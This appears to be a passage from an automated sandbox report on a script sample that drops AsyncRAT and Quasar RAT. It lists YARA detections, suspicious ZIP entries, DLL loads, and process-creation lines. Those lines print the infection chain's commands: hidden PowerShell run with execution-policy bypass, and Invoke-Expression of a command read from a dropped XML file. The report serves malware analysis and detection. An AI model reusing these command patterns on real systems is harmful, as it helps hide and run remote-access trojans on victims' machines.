              Source: 38.2.powershell.exe.2b30f4a3068.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 38.2.powershell.exe.2b30f4a3068.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 22.2.RegSvcs.exe.3f95168.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 22.2.RegSvcs.exe.7230000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000016.00000002.4626854201.0000000005247000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000016.00000002.4523483443.0000000001029000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 00000016.00000002.4646402691.00000000066FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000016.00000002.4523483443.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000016.00000002.4652798052.0000000007230000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 00000016.00000002.4588985602.0000000003DB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 00000016.00000002.4647656889.000000000673B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000016.00000002.4626854201.0000000005230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000016.00000002.4646275028.00000000066F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000027.00000002.4004352545.000000000300F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000016.00000002.4536701610.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000014.00000002.2326561613.000001383AC82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 0000001F.00000002.2797263415.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000016.00000002.4628005703.0000000005250000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000027.00000002.3995210664.0000000001249000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001E.00000002.2739422188.000002D902967000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 00000016.00000002.4536701610.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 0000001E.00000002.2739422188.000002D9002B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 0000001F.00000002.2808356805.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: Process Memory Space: RegSvcs.exe PID: 3816, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: Process Memory Space: RegSvcs.exe PID: 5040, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: Process Memory Space: RegSvcs.exe PID: 5040, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: Process Memory Space: RegSvcs.exe PID: 3728, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
              Found suspicious ZIP file
              Source: BIT87CA.tmp.5.drZip Entry: TextCZvTbYMEYspgaPVo.vbs
              Source: BIT87CA.tmp.5.drZip Entry: NewRdpFirstTry.vbs
              Source: BIT87CA.tmp.5.drZip Entry: nKNmegHQBbmlQMTN.bat
              Source: BIT87CA.tmp.5.drZip Entry: solankedoubledigits.bat
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nKNmegHQBbmlQMTN.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $commandJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nKNmegHQBbmlQMTN.bat" "Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD348AC5683_2_00007FFD348AC568
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD348A91F63_2_00007FFD348A91F6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD348A44F83_2_00007FFD348A44F8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD348B4CFB3_2_00007FFD348B4CFB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD348B75FA3_2_00007FFD348B75FA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD348A5EF23_2_00007FFD348A5EF2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD348B172D3_2_00007FFD348B172D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD348A20983_2_00007FFD348A2098
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD348B609D3_2_00007FFD348B609D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD3489587B12_2_00007FFD3489587B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD34894FED12_2_00007FFD34894FED
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD348956FA12_2_00007FFD348956FA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD348946F212_2_00007FFD348946F2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD34893F5B12_2_00007FFD34893F5B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD34893D4212_2_00007FFD34893D42
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD3489544512_2_00007FFD34895445
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFD3489396520_2_00007FFD34893965
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFD3489431520_2_00007FFD34894315
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFD348966B820_2_00007FFD348966B8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFD348957FA20_2_00007FFD348957FA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFD34893BF320_2_00007FFD34893BF3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFD349635E520_2_00007FFD349635E5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_072BE6B022_2_072BE6B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_072BA60822_2_072BA608
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_0735E60922_2_0735E609
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_0735F6F422_2_0735F6F4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_0735ACF822_2_0735ACF8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_0735131822_2_07351318
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_073579A022_2_073579A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_0735C0C822_2_0735C0C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_0735DB0022_2_0735DB00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_0735130B22_2_0735130B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_07373C2022_2_07373C20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_0737493022_2_07374930
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_073C712022_2_073C7120
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_073C41E822_2_073C41E8
              Source: Summaryform_FXnbLLyKOJ.wsfInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
